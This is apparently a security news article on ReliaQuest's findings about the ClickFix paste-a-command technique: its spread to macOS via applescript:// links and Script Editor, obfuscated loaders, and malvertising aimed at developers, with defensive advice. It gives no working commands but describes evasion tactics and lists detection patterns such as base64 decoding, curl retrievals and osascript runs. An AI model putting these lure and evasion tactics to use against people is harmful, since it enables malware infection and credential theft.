ClickFix Technique Dominates Malware Delivery, Expands to macOS
A social engineering tactic known as ClickFix has become the leading method for malware delivery, with researchers noting its expansion to macOS and targeting of developers.

In a significant shift in threat actor tactics, the social engineering technique dubbed "ClickFix" has rapidly ascended to become the dominant method for malware delivery, according to new research from ReliaQuest. What was once an emerging tactic observed in 2024 has, in just two years, become the overwhelming favorite among cybercriminals for gaining initial access and evading defenses. ClickFix primarily works by tricking targeted individuals into copying and pasting malicious commands directly into system dialogs, such as Windows Terminal or macOS's Script Editor.
Attackers employ deceptive tactics, presenting users with fake error messages or verification prompts like CAPTCHAs. These prompts contain text-based commands that, when executed by the user, initiate the malicious payload. This method is particularly effective as it bypasses many traditional security measures, including file scanning and standard email-based defenses. ReliaQuest's analysis, covering activity from March 1 to May 31, found ClickFix prevalent in both initial access and defense-evasion categories.
The technique's reach has also expanded beyond Windows. Researchers observed ClickFix activity on macOS systems for the first time, with a notable example involving the Atomic macOS Stealer (AMOS). Threat actors have adapted their approach, moving from fake software lures to using applescript:// links that automatically open macOS's built-in Script Editor to run malicious commands. This change is designed to circumvent new warnings Apple introduced in macOS 26.4 that appear when users paste commands directly into the Terminal, a warning not triggered by Script Editor.
This expansion necessitates that security teams treat macOS with the same level of vigilance as Windows. "ClickFix can no longer be handled as a special case," stated Raigridas Bartkus, cybersecurity specialist at ReliaQuest. "Training, detection, and triage for it should run continuously on both Windows and macOS." Organizations must ensure their monitoring and response capabilities cover both operating systems comprehensively.
ReliaQuest's report also highlighted ClickFix's role in defense evasion, accounting for nearly 28% of such activity during the analyzed period. This was achieved through sophisticated command and file obfuscation techniques, including the use of AI-generated obfuscation to hide malware logic under thousands of variable assignments. One specific ClickFix loader observed was designed to deliver "Deepload" malware, with its obfuscation making it difficult for defenders to develop signatures quickly.
A concerning trend identified is the targeting of developers. Malvertising campaigns, particularly those appearing as sponsored search results on Google Ads for tools like "claude code install" and "homebrew install," have been used to lure developers. These fake installation pages present error messages that instruct users to copy and paste malicious commands. In compromised instances, exposed npm and Bitbucket tokens were found on affected hosts, indicating that these attacks are successfully reaching their intended, high-risk targets.
Furthermore, ClickFix is evolving from a simple delivery mechanism into a launchpad for more complex post-exploitation activities. ReliaQuest observed instances where a single pasted command was used for domain enumeration and to establish persistent access without dropping any malware. To combat this evolving threat, ReliaQuest recommends user training on both platforms to avoid pasting commands into sensitive tools, and for organizations to consider restricting access to tools like Terminal and Script Editor for average users, while implementing robust logging and alerting for developer environments.
Defensive strategies should focus on user education and technical controls. Training employees to recognize and avoid executing commands from untrusted sources is paramount. For technical staff, blocking these essential workflow tools is often impractical; therefore, robust monitoring for anomalous sequences of activity, such as base64 decoding, curl retrievals, and PowerShell or osascript executions, becomes a critical detection mechanism.